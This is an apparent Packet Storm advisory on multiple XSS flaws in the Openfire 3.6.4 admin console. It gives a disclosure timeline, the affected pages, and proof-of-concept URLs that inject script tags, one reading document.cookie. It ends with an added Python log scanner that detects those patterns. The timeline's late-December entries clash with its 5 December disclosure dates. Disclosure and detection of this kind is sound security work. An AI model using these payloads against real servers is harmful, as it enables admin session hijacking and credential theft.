Openfire 3.6.4 Cross Site Scripting

2011-01-05T00:00:00
ID PACKETSTORM:97270
Type packetstorm
Reporter Riyaz Walikar
Modified 2011-01-05T00:00:00

Description

Hi,
  
This is regarding multiple XSS Vulnerabilities in Openfire 3.6.4  
Administrative Section. The following is the disclosure document:  
  
Title: Multiple XSS Vulnerabilities in Openfire 3.6.4 Administrative Section
------------------------------------------------------------------------
  
Project: Openfire  
Severity: High  
Versions: 3.6.4 (other versions may be affected)  
Exploit type: Multiple XSS  
------------------------------------------------------------------------
  
Timeline:
14 October 2010: Vendor Contacted
15 October 2010: Vendor Response received. Asks to verify the issues in beta.
28 October 2010: Informed Vendor that multiple pages are still vulnerable
03 November 2010: Acknowledgement / Update requested
03 November 2010: Update received. No fixes initiated.
23 November 2010: Informed vendor disclosure date set to 1/12/2010
22 December 2010: Update requested.
22 December 2010: Vendor asks to release information as the vulnerabilities are already known
23 December 2010: A different contact at the Vendor location informs that there are no updates.
24 December 2010: Disclosure date set to 5 December 2010
05 December 2010: Public disclosure.
------------------------------------------------------------------------
  
Product Description:  
Openfire is a real time collaboration (RTC) server licensed under the  
Open Source GPL. It uses the only widely adopted open protocol for  
instant messaging, XMPP (also called Jabber). Openfire is incredibly  
easy to setup and administer, but offers rock-solid security and  
performance.  
(Source: http://www.igniterealtime.org/projects/openfire/)  
------------------------------------------------------------------------
  
Affected Files/Locations/Modules:  
login.jsp  
security-audit-viewer.jsp  
user-create.jsp  
plugins/search/advance-user-search.jsp  
user-roster-add.jsp  
user-roster.jsp  
group-create.jsp  
group-edit.jsp  
group-delete.jsp  
muc-room-edit-form.jsp  
muc-room-delete.jsp  
plugins/clientcontrol/create-bookmark.jsp  
plugins/clientcontrol/spark-form.jsp  
  
------------------------------------------------------------------------
  
Vulnerability Details:  
A user can insert HTML or execute arbitrary JavaScript code within the
vulnerable application. The vulnerabilities arise from insufficient
input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but is
not limited to, compromise of the application, theft of cookie-based
authentication credentials, arbitrary page redirection, disclosure or
modification of sensitive data, and phishing attacks.

Since the vulnerabilities exist in the administrative module, a
successful attack could cause a complete compromise of the entire
application. An attacker can send a link containing the exploit to an
administrator, whose access could then be used to compromise the application.
------------------------------------------------------------------------
  
Proof of Concept:  
Persistent XSS:  
http://localhost:9090/login.jsp?url=&username=test" onfocus=javascript:window.location.assign('http://www.google.com');">

http://localhost:9090/login.jsp?url=hello" onfocus=javascript:window.location.assign('http://www.google.com');">

http://localhost:9090/security-audit-viewer.jsp?range=15&username="><script>alert('xss')</script>&search=Search

http://localhost:9090/user-create.jsp?username=test"><script>alert('xss')</script>
http://localhost:9090/user-create.jsp?name=test"><script>alert('xss')</script>
http://localhost:9090/user-create.jsp?email=test"><script>alert('xss')</script>

http://localhost:9090/plugins/search/advance-user-search.jsp?criteria=test"><script>alert('xss')</script>

http://localhost:9090/user-roster-add.jsp?username=test<script>alert('xss')</script>
http://localhost:9090/user-roster-add.jsp?username=user&jid=1&nickname=<script>alert('XSS')</script>&email=<script>alert('XSS')</script>&add=Add+Item

http://localhost:9090/user-roster.jsp?username=test<script>alert(document.cookie)</script>
http://localhost:9090/user-lockout.jsp?username=test<script>alert('xss')</script>

http://localhost:9090/group-create.jsp?name=test<script>alert('xss')</script>&description=<script>alert('xss')</script>&create=Create+Group

http://localhost:9090/group-edit.jsp?creategroupsuccess=true&group=test<script>alert('xss')</script>

http://localhost:9090/group-delete.jsp?group=<script>alert('xss')</script>

http://localhost:9090/muc-room-edit-form.jsp?save=true&create="><script>alert('XSS')</script>&roomconfig_persistentroom="><script>alert('XSS')</script>&roomName=23&mucName=conference&roomconfig_roomname=<script>alert('XSS')</script>&roomconfig_roomdesc=<script>alert('XSS')</script>&room_topic=<script>alert('XSS')</script>&roomconfig_maxusers="><script>alert('XSS')</script>&roomconfig_presencebroadcast=<script>alert('XSS')</script>true&roomconfig_presencebroadcast2="><script>alert('XSS')</script>&roomconfig_presencebroadcast3=true"><script>alert('XSS')</script>&roomconfig_roomsecret="><script>alert('XSS')</script>&roomconfig_roomsecret2="><script>alert('XSS')</script>&roomconfig_whois=moderator"><script>alert('XSS')</script>&roomconfig_publicroom=true"><script>alert('XSS')</script>&roomconfig_canchangenick=true"><script>alert('XSS')</script>&roomconfig_registration=true"><script>alert('XSS')</script>&Submit=Save+Changes

http://localhost:9090/muc-room-delete.jsp?roomJID="><script>alert('XSS')</script>&create=false

http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?urlName="><script>alert('XSS')</script>&url="><script>alert('XSS')</script>&users="><script>alert('XSS')</script>&groups="><script>alert('XSS')</script>&rss=off&createURLBookmark=Create&type=url

http://localhost:9090/plugins/clientcontrol/spark-form.jsp?optionalMessage=</textarea><script>alert('XSS')</script>&submit=Update+Spark+Versions


Stored XSS:
http://localhost:9090/group-create.jsp
http://localhost:9090/group-summary.jsp
Method: Navigate to http://localhost:9090/group-create.jsp, and create a
new group with the following details.
Group Name: Test<script>alert("xss")</script>
Description: Test<script>alert("xss")</script>
Click on Create Group, you will be greeted with multiple alert boxes. Click
on Group Summary from the left pane or navigate to
http://localhost:9090/group-summary.jsp to be greeted again by multiple
alert boxes completing the PoC.
------------------------------------------------------------------------
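As an added example (not part of the advisory or of Openfire), the following Python scans NCSA-style access-log lines for requests to the pages listed above whose parameters carry the markup patterns the PoCs rely on. The log format, the sample lines and the presence of such a log in front of the admin console are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Admin-console pages named in the advisory (paths relative to the console root).
AFFECTED_PAGES = {
    "/login.jsp", "/security-audit-viewer.jsp", "/user-create.jsp", "/user-roster-add.jsp",
    "/user-roster.jsp", "/group-create.jsp", "/group-edit.jsp", "/group-delete.jsp",
    "/muc-room-edit-form.jsp", "/muc-room-delete.jsp", "/plugins/search/advance-user-search.jsp",
    "/plugins/clientcontrol/create-bookmark.jsp", "/plugins/clientcontrol/spark-form.jsp",
}
# Markup from the PoCs: a script/textarea tag, an attribute-closing '">', or an on*= handler.
MARKUP = re.compile(r'<\s*/?\s*(script|textarea)\b|"\s*>|\bon[a-z]+\s*=', re.I)
# NCSA-style request line (assumption: a proxy or Jetty request log in this format
# sits in front of the console; Openfire itself does not write one by default).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" \d{3}')

# Constructed sample lines: two attempts matching the advisory's patterns, one
# legitimate group creation, and markup aimed at a page the advisory does not list.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jan/2011:10:00:00 +0000] "GET /user-create.jsp?username=test%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1" 200 4121',
    '10.0.0.5 - - [05/Jan/2011:10:00:01 +0000] "GET /group-create.jsp?name=staff&description=Our+staff&create=Create+Group HTTP/1.1" 302 0',
    '10.0.0.9 - - [05/Jan/2011:10:00:02 +0000] "GET /login.jsp?url=&username=test%22+onfocus%3Dalert(1)%22%3E HTTP/1.1" 200 2210',
    '10.0.0.9 - - [05/Jan/2011:10:00:03 +0000] "GET /index.jsp?foo=%3Cscript%3E HTTP/1.1" 200 100',
]

def suspicious_params(target):
    """Return (name, decoded value) pairs that carry markup; [] if the page is not in scope."""
    parts = urlsplit(target)
    if parts.path not in AFFECTED_PAGES:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl percent-decodes once; unquote again so double-encoded payloads are caught.
        if MARKUP.search(unquote(value)):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Yield (client ip, page, [(param, value), ...]) for each request that looks like an attempt."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits = suspicious_params(m.group("target"))
            if hits:
                yield m.group("ip"), urlsplit(m.group("target")).path, hits

if __name__ == "__main__":
    for ip, page, hits in scan_log(SAMPLE_LOG):
        print(ip, page, hits)
```

Widen AFFECTED_PAGES (or drop the path check) to use the same parameter inspection for general monitoring rather than only the pages this advisory names.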
  
Warm Regards,  
Riyaz Ahemed Walikar || Senior Engineer - Professional Services  
Vulnerability Assessment & Penetration Testing  
Microland Limited  
www.microland.com